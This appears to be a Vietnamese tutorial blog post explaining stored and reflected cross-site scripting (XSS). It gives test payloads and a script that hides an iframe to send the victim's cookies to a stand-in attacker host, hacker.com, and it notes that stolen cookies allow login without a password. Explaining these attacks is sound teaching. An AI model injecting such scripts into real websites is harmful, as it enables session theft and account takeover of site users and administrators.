Các kỹ thuật tấn công website mà hacker thường sử dụng để lấy cắp, phá hỏng dữ liệu trên hệ thống
ngoài sql injection còn có xss (cross – site scripting) và csrf
bạn đọc tìm hiểu kỹ thuật tấn công CSRF tại đây
bài viết này mình trình bày về kỹ thuật tấn công dạng XSS (Cross-Site Scripting) – kỹ thuật này không tấn công vào CSDL hệ thống như SQL injection mà chúng tấn công trực tiếp từ phía người dùng bằng cách lừa thằng quản trị website =D xâm nhập hệ thống bằng các đoạn mã đơn giản để lấy cắp cookies và session từ đó chúng có thể thao túng người dùng cướp quyền truy cập tài khoản mà không cần tới mật khẩu.
Cross-site Scripting được phân thành 2 loại lỗi dưới đây
thứ nhất: Lỗi Stored XSS
dạng lỗi XSS mà đoạn mã chèn thêm vào được lưu trữ trên server như trong CSDL dưới dạng các comment bình luận bài viết, các message trong diễn đàn (forum) hoặc các vistor log.
Để hình dung rõ được bạn coi ví dụ sau:
Thay vì nhập những dòng comment trên, ta nhập đoạn mã <script>alert(“XSS”)</script>
đoạn mã trên được chèn vào mục comment và sẽ thực thi lệnh khi ta chọn submit (send) nội dung. thông điệp đó được chèn vào CSDL hệ thống. Ngoài trường comment, ta có thể thông qua các điểm đầu vào input, form, text area,…mà chèn vào các đoạn mã nguy hiểm đưa vào hệ thống (nhất là form mua hàng, thanh toán,…)Bạn đọc coi toàn bộ kịch bản tấn công áp dụng kỹ thuật XSS dưới đây để bao quát rõ hơn
Thứ hai là: Reflected XSSKhác với Stored-XSS, Reflected XSS chèn đoạn mã khai thác thông tin không được lưu trữ trên serverHình thức tấn công là lợi dụng vào các form search, khi nhập từ khoá vào ô tìm kiếm mà không hiển thị kết quả tìm kiếm, ta nhập 1 đoạn mã tại trường này có dạng “Tên đường dẫn url website cần xâm nhập/xss/reflected/index.php?q=<script>alert(“XSS”)</script>”. Chỗ đường dẫn này tuỳ vào mã nguồn hệ thống (website) để điền cho phù hợpĐường dẫn trên chỉ chạy trên url người dùng chứ không lưu vào hệ CSDL, và người dùng bị tấn công khi chạy trên url đó mà thôi.Kịch bản điển hình nhất khi khai thác XSS là ta = chèn đoạn javascript như sau vào website:
1 | <script type= "text/javascript" > |
2 | document.write("<iframe width=0 height=0 |
3 | src=http: //hacker.com/getcookie.php?cookie=", |
4 | document.cookie, ">" ); |
5 | </script> |
Một iframe với kích thước 0×0 được chèn vào trang web và sẽ tự động load trang lấy cookie của hacker tại địa chỉ http:
//hacker.com/getcookie.php.
Khi có được cookie,ta có thể dễ dàng đăng nhập mà không cần biết mật khẩu của người dùng.
Tổng quát lại:
Reflected XSS và Stored XSS có 2 sự khác biệt lớn trong quá trình tấn công.
Từ những điều này có thể thấy Stored XSS nguy hiểm hơn Reflected XSS rất nhiều, đối tượng bị ảnh hưởng có thế là tất cả nhưng người sử dụng ứng dụng web đó. Và nếu nạn nhân có vai trò quản trị thì còn có nguy cơ bị chiếm quyền điều khiển web.
Nguồn: http://learntesting123.blogspot.com/2014/11/tim-hieu-ky-thuat-tan-cong-va-phong.html
You need to login in order to like this post: click here
YOU MIGHT ALSO LIKE